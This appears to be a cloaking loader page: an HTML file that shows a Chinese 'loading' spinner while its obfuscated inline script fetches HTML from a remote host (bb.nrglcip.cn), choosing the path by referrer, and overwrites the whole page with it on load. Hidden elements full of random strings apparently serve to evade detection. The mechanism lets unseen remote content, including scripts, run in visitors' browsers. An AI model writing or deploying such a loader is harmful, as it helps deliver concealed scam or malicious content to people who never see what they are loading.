<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ccQxHUm {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ccQxHUm .tx17OvHP6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ccQxHUm .content {
            line-height: 50px;
            text-align: center
        }

        .ccQxHUm .img {
            width: 100%
        }

        .ccQxHUm .bnc7mWP {
            text-align: center
        }

        .ccQxHUm .bnc7mWP span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ccQxHUm .bnc7mWP span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ccQxHUm .bnc7mWP span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ccQxHUm .bnc7mWP span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ccQxHUm .bnc7mWP span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ccQxHUm .bnc7mWP span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ccQxHUm .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bJ2MmJsLn(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var mudAZaO = bJ2MmJsLn('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ mudAZaO +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ mudAZaO +".html?a=share";
		}
		
        F6AClpL=url+"#"+new Date().getTime();
        F6AClpL && function() {
            $.get(F6AClpL, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >EO6lmb0mE4mpuhvYWbrwDDHTBe1NoZ85Tj24StWVmRaldVuZ1Ym8S0AuJwdXwwEjWBqowhpsmiIf15L6lMhgG3NSFfR7SMQrCZO</b>
<ul style='display:none' >qrPtFNkyb96Vp10lczfIZ44CFUSfadereExbIHdd2c0INvo3U4GLqnvHavIapAtFgsAN0GcfgVgTk2jPtVM</ul>
<a  href='#' style='display:none'>ccsCOorzkxxr5OhnQXcCAgB</a>
<li style='display:none' >HLgpFGpTaFe60qvdv48tq5EW5jFAkWGnh02bw0FiEuTsnIpdSKw</li>
<img  src='' style='display:none'>
<div style='display:none'>hKGWozI6xVtemtkvl3Ozm5ZhbK99behePZsO6uRuW97e0SXeWxSy5ZLV7MG30PBoa1NfESQY</div>
<p  style='display:none'>B3wxU8COQX8kjWD</p><div class="ccQxHUm">
    <div class="tx17OvHP6">
        <div class="bnc7mWP">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >cGWY9DezrMTY</h1>
<span style='display:none'>TK1QSOy2YnSPFk9LzzlJ0xEXr6sx</span>
<img  src='' style='display:none'></body>
</html>